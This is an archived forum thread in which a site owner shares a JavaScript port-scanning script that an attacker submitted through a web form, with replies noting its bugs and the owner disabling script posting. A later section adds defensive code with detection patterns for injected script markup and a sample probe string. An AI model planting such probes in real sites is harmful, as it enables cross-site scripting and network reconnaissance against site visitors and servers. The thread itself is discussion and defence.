
Attacker


djp1988


Hi everyone, I had some smart arse trying to get some info from my site by posting javascript in a form, thought you guys may be interested in having a look:

<script>
function scanPort(callback,target, port, timeout){
  var timeout = (timeout == null)?100:timeout;
  var img = new Image();
  img.onerror = function () {
    if (!img) return;
    img = undefined;
    callback(target, port, 'open');
  };
  img.onload = img.onerror;
  img.src = 'http://' + target + ':' + port;
  setTimeout(function () {
    if (!img) return;
    img = undefined;
    callback(target, port, 'closed');
  }, timeout);
};
function record(ip,port,open){
  alert(ip+':'+port+' is '+open);
}
function scan(ip,portfrom,portto,timeout){
  for (i=portfrom;i=portto;i++){
    scanPort(record(),ip,i,timeout);
  }
}
scan('0.0.0.0',1,80,200);
</script>

The 0.0.0.0 was the site's IP.

The same person opened another account and inserted the following in a javascript tag:



The "hacker" is just trying to scare you.

The first script does nothing but go opening alert boxes that say "0.0.0.0:1 is open".

By the way, he made a mistake here and executed a function rather than reference it:

scanPort(record(),ip,i,timeout)

The second thing you're showing doesn't actually do anything at all, it's just a series of random characters that might slightly resemble some form of JSON.

Are you allowing people to post JavaScript on your page?


It would appear so, yes :)

I've gone through this and disabled it now. I made these scripts a few years ago... since, I've been doing different projects and haven't really had time to go back and redo and improve older projects.

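One way to handle form input like the two submissions in this thread, as an added example that is not part of the original posts: flag script markup and `\xNN`-escaped blobs when a value is submitted, and HTML-escape the value before it is rendered. The function names are hypothetical and the sample inputs are constructed for illustration.

```javascript
// Added example; function names are hypothetical, sample inputs are constructed.

// Decode one layer of \xNN escapes so obfuscated input can be read as plain text.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Encode HTML-significant characters so a browser displays markup instead of running it.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Patterns checked against both the raw value and its decoded form.
const RULES = [
  ['script-tag', /<\s*script\b/i],
  ['event-handler', /\bon[a-z]+\s*=/i],
  ['javascript-url', /javascript\s*:/i],
  ['image-probe', /new\s+Image\s*\(/i],
];

function triageSubmission(raw) {
  const reasons = [];
  const escapes = raw.match(/\\x[0-9a-fA-F]{2}/g) || [];
  // Ordinary form text is not made up mostly of \xNN sequences.
  if (escapes.length >= 8 && escapes.length * 4 >= raw.length / 2) {
    reasons.push('hex-escaped-blob');
  }
  const decoded = decodeHexEscapes(raw);
  for (const [name, re] of RULES) {
    if (re.test(raw) || re.test(decoded)) reasons.push(name);
  }
  return { reasons, decoded, safeHtml: escapeHtml(raw) };
}

// Constructed inputs: an image-based probe, script markup hex-escaped, and benign text.
const SAMPLE_PROBE = "<script>var img = new Image(); img.onerror = done; img.src = 'http://192.0.2.10:80';</script>";
const SAMPLE_ESCAPED = Array.from('<script>x()</script>',
  (c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_BENIGN = "Tom & Jerry's <3 club";

for (const s of [SAMPLE_PROBE, SAMPLE_ESCAPED, SAMPLE_BENIGN]) {
  const r = triageSubmission(s);
  console.log(r.reasons.length ? 'FLAG ' + r.reasons.join(',') : 'ok', '->', r.safeHtml.slice(0, 40));
}
```

The flags are only a signal for review; escaping on output is what keeps a stored submission from running in a visitor's browser.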

Archived

This topic is now archived and is closed to further replies.
